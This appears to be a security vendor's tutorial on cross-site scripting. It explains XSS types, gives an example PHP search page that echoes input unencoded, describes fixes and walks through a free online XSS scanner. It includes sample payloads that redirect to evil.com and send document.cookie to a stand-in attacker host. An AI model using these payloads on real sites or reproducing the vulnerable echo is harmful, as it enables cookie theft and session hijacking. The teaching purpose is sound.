Security for everyone

How To Test XSS Online and Free

SecurityForEveryone

12/Sep/22

In this post, we'll teach you how to utilize Generic XSS Scanner, a free and internet-based tool that may be used to detect XSS.

Before we get into how to use our free XSS scanning tools, let's quickly refresh our memories.

What is XSS?

XSS (Cross-Site Scripting) is a type of vulnerability found in web applications that allows attackers to inject malicious code into web pages viewed by other users. This can allow the attacker to steal cookies, hijack user sessions, or redirect the user to malicious sites.

Exploiting an XSS vulnerability takes two steps: the attacker injects malicious JavaScript code into a web page, and that code is then executed by the victim's browser.

What is the Risk of XSS?

XSS is one of the most common web application security risks. It can be used to:

  • Hijack user sessions
  • Steal cookies
  • Deface websites
  • Redirect users to malicious sites
  • Inject malware onto the victim's machine

What are the types of XSS?

There are three types of XSS vulnerabilities:

Reflected XSS - The malicious code is not stored on the web server. It is sent in an HTTP request and reflected off the web server, such as in an error message, search result, or any response that includes user input.

Stored XSS - The malicious code is permanently stored on the server, such as in a database, and displayed to users when they request a page.

DOM-based XSS - In this type the malicious code is neither stored nor reflected by the server. Instead, vulnerable client-side JavaScript takes attacker-controlled data (for example, part of the URL) and writes it into the page, where the browser executes it.

Sample Code For XSS Vulnerability

Let's think that we have a blog app named example.com and there is a search bar for users to find necessary posts. When a user searches for something on our site, we show them a message that says "Results for {searched_terms}" and then blog posts containing those terms.

So the basic code would look like the following:

Search bar code:

<form method="get" action="/search"> <input type="text" name="term"> </form>

Result page code:

<!-- Result header: the search term is echoed without any encoding (this is the vulnerable line) -->
Results for <?php echo $_GET['term'] ?>

<!-- Loop for blog post result -->

If a user searches for the term "security", our page would look like this.

URL: example.com/search?term=security

Result Header: Results For security

And everyone who visits the URL example.com/search?term=security will see the same page. Is everything alright? There isn't a problem, is there? What if a user searches for something like this: <b>bold</b>

URL: example.com/search?term=<b>bold</b>

Result Header: Results For bold

The <b> tags placed in the search term are interpreted as HTML when the browser renders the results page. The same is true for any other HTML or JavaScript code.

From an attacker's perspective, how can this be useful? What if we search for: <script>window.location="https://www.evil.com"</script>

URL: example.com/search?term=<script>window.location="https://www.evil.com"</script>

Result Header: Results For

If you visit the URL, you will be redirected to evil.com without any notification, because the injected JavaScript is rendered as part of our page and executed by the browser.

Here are some other XSS attack payloads:

  • Steal cookies: <script>img=new Image();img.src="http://attacker/" + document.cookie;</script>
  • Another payload to steal: <script>document.write("<iframe src='http://attacker/cookiegrabber.php?c=" + document.cookie + "'></iframe>");</script>
  • Display a popup box: <script>alert('xss');</script>

Fixing XSS Vulnerability

There are two main ways to fix XSS:

Input Validation: Only allow characters that are known to be safe. This can be done with blacklisting or whitelisting. It is not a comprehensive solution on its own, but applied correctly it does reduce the risk.

  • Blacklisting - This approach involves identifying and removing dangerous characters from user input. The problem with this method is that it's difficult to anticipate all the ways an attacker might try to inject malicious code.
  • Whitelisting - This approach involves only allowing known good characters in user input. This is a more effective method, but it can be difficult to implement.

Output Encoding: When displaying user input, encode it so that the browser cannot interpret it as HTML code. This is the only reliably effective technique for fixing an XSS vulnerability. The encoding to use depends on where the data will be displayed.

For example, if the data will be displayed in an HTML attribute, you would use HTML entity encoding. If the data will be used as part of a JavaScript code, you would use JavaScript escaping.

How to Use Generic XSS Scanner: Test XSS Online

We will use the free and online Generic XSS Scanner. No technical knowledge is needed; all you have to do is click a few buttons. However, if you are an expert, there are several settings and parameters you can adjust for the scan.

Simplest Way: Use Fast Scan

The fast scan is a great way to use a free and online generic XSS scanner. You need to click one button only. Just enter any URL you want to scan and click the 'Start Scan' button.

But it has some limitations:

  • If you want to scan the parameters of a form used in a page (like a login form), use the HTML form parser.
  • The fast scan allows you to quickly check any parameter in the query string using the HTTP GET method.
  • Use expert mode if the application accepts data using other HTTP methods (e.g., POST, PUT, or DELETE).
  • If the application requires authentication to access a web page you wish to scan, use expert mode with the necessary authentication header.

Second Way: HTML Form Parser

The HTML form parser feature helps you identify and scan any form parameters that are used in web pages. In web applications, forms are used to submit data to the server (e.g., login, contact, or search forms). Just enter any URL containing the form you want to test and click the `Analyze` button.

Our engine will parse all the forms with all parameters. Click the `Scan` button near the parameters you want to test.

  • Use expert mode if the application accepts data using other HTTP methods (e.g., POST, PUT, or DELETE).
  • If the application requires authentication to access a web page you wish to scan, use expert mode with the necessary authentication header.

Third Way: Use Expert Mode

The expert mode lets you customize every part of an HTTP request: the HTTP method (GET, POST, PUT, DELETE), the HTTP headers, and the request body.

Here are some hints:

  • Use authentication headers if your web page needs authentication.
  • You can set any HTTP method and use any valid header you want.
  • Request body can be set with any HTTP method.

Results

There will be three types of results from your scan:

  • Compact: One-word output showing whether the target is vulnerable or not.
  • Detail: Further details of the output, such as the parameters tested and the vulnerability type.
  • Video: The commands we used to check, the output of the scan, and the vulnerability types, so you can watch the whole scan process.

You can export the results as PDF, HTML, or CSV.

If you need any help, please do not hesitate to contact us via the support page.

Happy and secure days for all!
